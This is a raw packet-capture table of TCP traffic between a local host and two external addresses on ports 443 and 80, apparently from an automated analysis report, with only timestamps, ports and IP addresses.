Aug 10, 2024 16:12:25.527666092 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.527704000 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.527707100 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.527728081 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.527857065 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.528130054 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.528145075 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.528218985 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.528222084 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.528357983 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.528374910 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.528398037 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.528453112 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.528618097 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.528630972 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.528690100 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.528695107 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.528759003 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.541646957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541671991 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541693926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541707993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541713953 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.541723013 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541735888 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.541737080 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541743994 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.541752100 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541770935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.541780949 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541793108 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.541805029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541817904 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541817904 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.541832924 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541843891 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.541846991 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541858912 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.541867018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541867018 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.541881084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541887999 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.541896105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541897058 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.541909933 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541913986 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.541924953 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541930914 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.541945934 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.541949987 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541965008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541979074 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.541987896 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.541995049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542006016 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.542007923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542032003 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.542052984 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.542123079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542144060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542166948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542212963 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.542212963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542227030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542241096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542254925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542268991 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542283058 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.542293072 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.542316914 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.542746067 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542759895 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542773008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542789936 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.542798042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542799950 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.542810917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542815924 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.542829990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.542840004 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542846918 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.542855024 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542881012 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.542901039 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.542910099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542923927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542937994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542953014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542965889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.542979956 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.543001890 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.543119907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.543134928 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.543148994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.543160915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.543164968 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.543174982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.543190002 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.543190002 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.543203115 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.543214083 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.543222904 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.543231010 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.543245077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.543251991 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.543258905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.543262005 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.543281078 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.543288946 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547173023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547187090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547202110 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547224045 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547224045 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547246933 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547249079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547262907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547277927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547292948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547302008 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547321081 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547524929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547538996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547553062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547569990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547581911 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547614098 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547630072 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547642946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547656059 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547657967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547667027 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547672033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547682047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547698021 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547710896 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547830105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547879934 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547910929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547924042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547936916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547950029 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547951937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547960043 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547966003 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547977924 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.547981977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.547996044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.548019886 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.548243999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.548289061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553169966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553184986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553206921 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553221941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553225040 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553241014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553241014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553255081 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553266048 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553270102 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553272963 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553284883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553291082 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553299904 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553302050 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553313017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553319931 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553325891 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553328037 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553340912 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553344011 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553354025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553354979 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553369045 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553369045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553379059 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553385019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553399086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553426027 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553507090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553519964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553541899 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553556919 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553565979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553575993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553580046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553594112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553601027 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553607941 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553626060 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553631067 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553644896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553689003 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553859949 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553874016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553890944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553910017 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553915977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553919077 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553930044 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553944111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553946972 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553960085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.553977966 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.553997040 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.554008007 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.554022074 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.554044008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.554064035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.554079056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.554090023 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.554091930 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.554105043 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.554131031 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.580584049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580600023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580614090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580629110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580645084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580661058 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580674887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580677986 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.580677986 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.580677986 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.580689907 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580694914 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.580745935 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.580745935 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.580800056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580813885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580828905 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580842972 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580857992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580873013 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580903053 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.580903053 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.580903053 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.580914974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580916882 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.580929041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580943108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580974102 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580979109 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.580988884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.580995083 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581003904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581017971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581032038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581053972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581053972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581053972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581069946 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581120968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581135035 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581150055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581162930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581178904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581232071 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581232071 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581233025 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581279993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581294060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581307888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581336975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581351995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581365108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581370115 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581370115 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581378937 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581389904 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581393957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581403971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581419945 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581434011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581449032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581461906 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581478119 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581491947 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581499100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581499100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581499100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581499100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581506014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581521034 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581523895 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581538916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581553936 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581588984 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581588984 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581588984 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581598997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581613064 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581628084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581640959 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581645012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581655979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581717014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581717014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.581909895 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581922054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581943989 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581958055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581971884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.581984997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582003117 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582012892 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582012892 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582012892 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582021952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582036018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582045078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582051992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582067966 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582075119 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582076073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582088947 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582103014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582117081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582119942 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582130909 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582140923 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582163095 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582171917 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582185030 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582211018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582216024 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582216024 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582225084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582240105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582253933 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582288980 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582288980 CEST	49740	80	192.168.2.4	147.45.44.104
